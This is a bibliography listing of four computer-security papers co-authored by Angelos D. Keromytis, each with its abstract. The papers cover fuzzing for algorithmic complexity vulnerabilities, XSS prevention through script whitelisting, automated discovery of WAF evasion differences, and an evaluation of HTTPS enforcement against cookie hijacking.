Biblio

Filters: Author is Keromytis, Angelos D.  [Clear All Filters]
2018-05-02
Petsios, Theofilos, Zhao, Jason, Keromytis, Angelos D., Jana, Suman.  2017.  SlowFuzz: Automated Domain-Independent Detection of Algorithmic Complexity Vulnerabilities. Proceedings of the 2017 ACM SIGSAC Conference on Computer and Communications Security. :2155–2168.
Algorithmic complexity vulnerabilities occur when the worst-case time/space complexity of an application is significantly higher than the respective average case for particular user-controlled inputs. When such conditions are met, an attacker can launch Denial-of-Service attacks against a vulnerable application by providing inputs that trigger the worst-case behavior. Such attacks have been known to have serious effects on production systems, take down entire websites, or lead to bypasses of Web Application Firewalls. Unfortunately, existing detection mechanisms for algorithmic complexity vulnerabilities are domain-specific and often require significant manual effort. In this paper, we design, implement, and evaluate SlowFuzz, a domain-independent framework for automatically finding algorithmic complexity vulnerabilities. SlowFuzz automatically finds inputs that trigger worst-case algorithmic behavior in the tested binary. SlowFuzz uses resource-usage-guided evolutionary search techniques to automatically find inputs that maximize computational resource utilization for a given application. We demonstrate that SlowFuzz successfully generates inputs that match the theoretical worst-case performance for several well-known algorithms. SlowFuzz was also able to generate a large number of inputs that trigger different algorithmic complexity vulnerabilities in real-world applications, including various zip parsers used in antivirus software, regular expression libraries used in Web Application Firewalls, as well as hash table implementations used in Web applications. In particular, SlowFuzz generated inputs that achieve 300-times slowdown in the decompression routine of the bzip utility, discovered regular expressions that exhibit matching times exponential in the input size, and also managed to automatically produce inputs that trigger a high number of collisions in PHP's default hashtable implementation.
2017-08-18
Mitropoulos, Dimitris, Stroggylos, Konstantinos, Spinellis, Diomidis, Keromytis, Angelos D..  2016.  How to Train Your Browser: Preventing XSS Attacks Using Contextual Script Fingerprints. ACM Trans. Priv. Secur.. 19:2:1–2:31.

Cross-Site Scripting (XSS) is one of the most common web application vulnerabilities. It is therefore sometimes referred to as the “buffer overflow of the web.” Drawing a parallel from the current state of practice in preventing unauthorized native code execution (the typical goal in a code injection), we propose a script whitelisting approach to tame JavaScript-driven XSS attacks. Our scheme involves a transparent script interception layer placed in the browser’s JavaScript engine. This layer is designed to detect every script that reaches the browser, from every possible route, and compare it to a list of valid scripts for the site or page being accessed; scripts not on the list are prevented from executing. To avoid the false positives caused by minor syntactic changes (e.g., due to dynamic code generation), our layer uses the concept of contextual fingerprints when comparing scripts. Contextual fingerprints are identifiers that represent specific elements of a script and its execution context. Fingerprints can be easily enriched with new elements, if needed, to enhance the proposed method’s robustness. The list can be populated by the website’s administrators or a trusted third party. To verify our approach, we have developed a prototype and tested it successfully against an extensive array of attacks that were performed on more than 50 real-world vulnerable web applications. We measured the browsing performance overhead of the proposed solution on eight websites that make heavy use of JavaScript. Our mechanism imposed an average overhead of 11.1% on the execution time of the JavaScript engine. When measured as part of a full browsing session, and for all tested websites, the overhead introduced by our layer was less than 0.05%. When script elements are altered or new scripts are added on the server side, a new fingerprint generation phase is required. To examine the temporal aspect of contextual fingerprints, we performed a short-term and a long-term experiment based on the same websites. The former, showed that in a short period of time (10 days), for seven of eight websites, the majority of valid fingerprints stay the same (more than 92% on average). The latter, though, indicated that, in the long run, the number of fingerprints that do not change is reduced. Both experiments can be seen as one of the first attempts to study the feasibility of a whitelisting approach for the web.

2017-03-27
Argyros, George, Stais, Ioannis, Jana, Suman, Keromytis, Angelos D., Kiayias, Aggelos.  2016.  SFADiff: Automated Evasion Attacks and Fingerprinting Using Black-box Differential Automata Learning. Proceedings of the 2016 ACM SIGSAC Conference on Computer and Communications Security. :1690–1701.

Finding differences between programs with similar functionality is an important security problem as such differences can be used for fingerprinting or creating evasion attacks against security software like Web Application Firewalls (WAFs) which are designed to detect malicious inputs to web applications. In this paper, we present SFADIFF, a black-box differential testing framework based on Symbolic Finite Automata (SFA) learning. SFADIFF can automatically find differences between a set of programs with comparable functionality. Unlike existing differential testing techniques, instead of searching for each difference individually, SFADIFF infers SFA models of the target programs using black-box queries and systematically enumerates the differences between the inferred SFA models. All differences between the inferred models are checked against the corresponding programs. Any difference between the models, that does not result in a difference between the corresponding programs, is used as a counterexample for further refinement of the inferred models. SFADIFF's model-based approach, unlike existing differential testing tools, also support fully automated root cause analysis in a domain-independent manner. We evaluate SFADIFF in three different settings for finding discrepancies between: (i) three TCP implementations, (ii) four WAFs, and (iii) HTML/JavaScript parsing implementations in WAFs and web browsers. Our results demonstrate that SFADIFF is able to identify and enumerate the differences systematically and efficiently in all these settings. We show that SFADIFF is able to find differences not only between different WAFs but also between different versions of the same WAF. SFADIFF is also able to discover three previously-unknown differences between the HTML/JavaScript parsers of two popular WAFs (PHPIDS 0.7 and Expose 2.4.0) and the corresponding parsers of Google Chrome, Firefox, Safari, and Internet Explorer. We confirm that all these differences can be used to evade the WAFs and launch successful cross-site scripting attacks.

2017-04-24
Sivakorn, Suphannee, Keromytis, Angelos D., Polakis, Jason.  2016.  That's the Way the Cookie Crumbles: Evaluating HTTPS Enforcing Mechanisms. Proceedings of the 2016 ACM on Workshop on Privacy in the Electronic Society. :71–81.

Recent incidents have once again brought the topic of encryption to public discourse, while researchers continue to demonstrate attacks that highlight the difficulty of implementing encryption even without the presence of "backdoors". However, apart from the threat of implementation flaws in encryption libraries, another significant threat arises when web services fail to enforce ubiquitous encryption. A recent study explored this phenomenon in popular services, and demonstrated how users are exposed to cookie hijacking attacks with severe privacy implications. Many security mechanisms purport to eliminate this problem, ranging from server-controlled options such as HSTS to user-controlled options such as HTTPS Everywhere and other browser extensions. In this paper, we create a taxonomy of available mechanisms and evaluate how they perform in practice. We design an automated testing framework for these mechanisms, and evaluate them using a dataset of 30 days of HTTP requests collected from the public wireless network of our university's campus. We find that all mechanisms suffer from implementation flaws or deployment issues and argue that, as long as servers continue to not support ubiquitous encryption across their entire domain (including all subdomains), no mechanism can effectively protect users from cookie hijacking and information leakage.